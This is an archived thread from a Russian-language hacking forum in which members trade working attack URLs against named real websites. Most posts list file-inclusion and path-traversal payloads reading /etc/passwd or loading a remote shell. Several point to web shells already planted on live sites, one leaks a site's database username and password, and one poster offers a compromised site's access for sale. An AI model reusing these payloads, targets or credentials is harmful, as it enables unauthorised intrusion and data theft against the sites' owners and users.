HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.10.2007, 00:00
f1rebl00d
Познающий
Регистрация: 27.12.2006
Сообщений: 37
Провел на форуме:
1253202

Репутация: 133
По умолчанию

http://www.pioneer.es/eur/download.jsp?dir=%2Ffiles%2Fbrochures%2F2006%2FHE_ EX&filename=../../../../../../../../../etc/passwd&method=attachment
 
Ответить с цитированием

  #2  
Старый 07.10.2007, 00:45
FFFFx029A
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035

Репутация: 14
Отправить сообщение для FFFFx029A с помощью ICQ
По умолчанию

Вот жменька:
//-------------------------------------------------------------------------------
http://www.empirekosher.com/zip.php?contentpage=/etc/passwd
http://www.empirekosher.com/zip.php?contentpage=/tmp/error.php
http://www.empirekosher.com/zip.php?contentpage=[shell.from.ftp]
http://www.empirekosher.com/zip.php?contentpage=/wwww/htdocs/ (more hosts) acces
acces:
http://acmedistributinginc.com/log/
http://acmedistributinginc.com/log/error.php (is shell)
http://www.aftyouth.com/index.php
//-------------------------------------------------------------------------------
http://www.potterfan.com/fun.php?pf=[shell].php
http://www.potterfan.com/galleries/error.php (is shell)
$CONFIG['dbserver'] = 'localhost'; // Your database server
$CONFIG['dbuser'] = 'potterfa_galleri'; // Your mysql username
$CONFIG['dbpass'] = '356801'; // Your mysql password
$CONFIG['dbname'] = 'potterfa_galleries'; // Your mysql database name
//-------------------------------------------------------------------------------

http://www.invest-telekom.ru/main.php?i=service&d=[shell_url_path]&p=[shell_name].php
//-------------------------------------------------------------------------------
http://www.eelriver.org/engine.php?bit=../../../../etc/passwd
//---------------------------------------------------------------------------------
http://www.emsukraine.com.ua/index2.php3?name=[shell]
http://www.emsukraine.com.ua/tmp/error.php (shell)
//---------------------------------------------------------------------------------
http://www.energoprom.org.ua/rus.php?inc=[shell].php
http://www.energoprom.org.ua/oscom/error.php (shell)
-----------------------------------------------------------------------------------
http://www.star-bridge.org/?section=history&subsection=[shell]
-----------------------------------------------------------------------------------
http://www.morozov.com.ua/rus/body/video.php?menu=../../../../../etc/passwd
-----------------------------------------------------------------------------------
http://www.mobistyle.com.ua/?action=[shell].php
-----------------------------------------------------------------------------------
http://credit.koras.com.ua/?[shell]
http://credit.koras.com.ua/?/var/www/koras/tmp/error.php (shell)
-----------------------------------------------------------------------------------
http://www.td-bm.com.ua/?[shell]
-----------------------------------------------------------------------------------
http://www.atp.zp.ua/oborud.php?cmd=viewnews&name=../../../etc/passwd
-----------------------------------------------------------------------------------
http://www.feod.com.ua/print.php?/etc/passwd
-----------------------------------------------------------------------------------
http://www.vision-ua.com/patient/print.php?[shell]
http://www.vision-ua.com/patient/error.php (shell)
-----------------------------------------------------------------------------------
http://www.oselya.lviv.ua/jp/notez/index.php?vibor=[shell]
-----------------------------------------------------------------------------------
http://www.delight.dn.ua/index.php?go_id=other&url=[shell]
-----------------------------------------------------------------------------------
http://www.lbu.kiev.ua/index.php?r=devices&id=[url.html]
-----------------------------------------------------------------------------------
http://www.skifiya.com.ua/?ch=[shell].php
-----------------------------------------------------------------------------------
http://www.rondo.co.ua/?p=worker_info&link=[shell]
-----------------------------------------------------------------------------------
http://www.gashuk.kiev.ua/index.php?id=[shell]
-----------------------------------------------------------------------------------
http://www.multydom.crimea.ua/index.php?[shell].php
 
Ответить с цитированием

  #3  
Старый 07.10.2007, 00:53
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию

Код:
http://pureweb.fr/helpcenter/module.php?module=osTicket&file=../../../../../../etc/passwd
Код:
http://chat.uii.net.id/module.php?module=osTicket&file=../../../../../../etc/passwd
Код:
http://yourcustomerhelpdesk.com/module.php?module=osTicket&file=../../../../../../etc/passwd
Код:
http://nznetworking.com/module.php?module=osTicket&file=../../../../../../etc/passwd

Edit:

Код:
http://www.tmup-links.org/index.php?page=../../../../../../etc/passwd%00
 
Ответить с цитированием

  #4  
Старый 07.10.2007, 00:54
FFFFx029A
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035

Репутация: 14
Отправить сообщение для FFFFx029A с помощью ICQ
По умолчанию

Вот рамблер на вшивость проверяю иногда, нашол скрипт доступный на скачку, может кому пригодиться:

http://orsn.rambler.ru/images/captcha.php

(скрипт покамис скачуеться как фаил и можно поглядеть пхп код этого скрипта)

------------------------------------------------------------
Вроде нашол уязвимое место:
http://polls.rambler.ru/result.html?rubric=+&id=1262
в параметре rubric если вставить число 150 то выводит страницу, если лешее число то пишет страница ненайдена, пробывал туда мускул запросы сувать - выводит пустую страницу.. Здесь наверно или ниче нет или вывод ошибок перекрыт?

------------------------------------------------------------
Вот еще интересный прикол:
http://love.rambler.ru/tips/?tip=Login'
Ответ:
Внутренняя ошибка сервера
Произошла ошибка на стороне сервера. Служба поддержки автоматически проинформирована об этом. Попробуйте повторить операцию через некоторое время. В случае если ошибка повторится, свяжитесь со службой поддержки.

ггг
-------------------------------------------------------------
Ктото рамблер редактирует:
Заходя на http://shop.rambler.ru/ идет переадресация на http://shop.rambler.ru/index.php?root=1
И пишет ошибку:
Fatal error: Call to undefined function getMainCatsName() in /var/www/html/fo/ehouse/html/ssi/search_form.php on line 5

Последний раз редактировалось FFFFx029A; 07.10.2007 в 02:05.. Причина: еще нашол по поводу рамблера..
 
Ответить с цитированием

  #5  
Старый 07.10.2007, 21:24
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

kjentfolk.no какая-то группа.
Код:
http://www.kjentfolk.no/musikere/vinskvetten/frameset.php?load=../../etc/passwd?action=nyheter
 
Ответить с цитированием

  #6  
Старый 09.10.2007, 13:37
FFFFx029A
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035

Репутация: 14
Отправить сообщение для FFFFx029A с помощью ICQ
По умолчанию

Народ, хелп, у когонить случайно незавалялся скрипт или доступ к хакнутому "агенству недвижимости"?
П.С очень нужно, ща вот сам через гуглю ищу дырявые "агенства недвижимости", если найду - выложу)

(Если кто жадный - могу поменять на скрипт инет магазина который я делал сам вручную снуля, вот пример: http://else.com.ua)

-----------------------------------------------------------------------
Вот нашол и залил шелл: http://www.multydom.crimea.ua/error.php
но эт некатит, ибо сделано кривыми руками и больше 20 баксов мне за него недадут...
-----------------------------------------------------------------------

Если кому несложно, выручите меня, буду всегда рад помоч...

P.S нужно чото типа этого агенства недвижимости: http://www.arcoreal.com.ua
(чтоб был поиск по хатам)
 
Ответить с цитированием

  #7  
Старый 09.10.2007, 19:49
FFFFx029A
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035

Репутация: 14
Отправить сообщение для FFFFx029A с помощью ICQ
По умолчанию

http://nadejda.com.ua/index.php?page=search&prm=/../../../../../etc/passwd&opend=3

Жаль что шелл низя залить, какраз ищу сайт по недвижимости с поиском по параметрам
 
Ответить с цитированием

  #8  
Старый 09.10.2007, 13:38
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

вот прорыв крыши =))почти )))

Цитата:
http://www.prorivkirishi.com/mainpage.php?contentPage=
 
Ответить с цитированием

  #9  
Старый 09.10.2007, 19:28
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.klasikcz.eu/cs/index.php?jakyform=[url]
Код:
http://www.keybuy.com/index.php?cmd=[url]
Код:
http://www.itdistri.com/index.php?page=[url]
Код:
http://www.insoma.cz/index.php?id=[url]
Код:
http://www.idealguide.net/site/index.php?page=[url]
Код:
http://www.iaald.org/index.php?page=[url]

Последний раз редактировалось SWAT; 09.10.2007 в 19:43..
 
Ответить с цитированием

  #10  
Старый 09.10.2007, 19:45
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.horsens-baadeklub.dk/index.php?id=[url]
Код:
http://www.hiumi.it/mahoo/index.php?mahoo=[url]
Код:
http://www.heatherlynn.net/midisite/index.php?midiDisplay=[url]
Код:
http://www.gwynhughes.com/index.php?page=[url]

Последний раз редактировалось SWAT; 09.10.2007 в 19:49..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ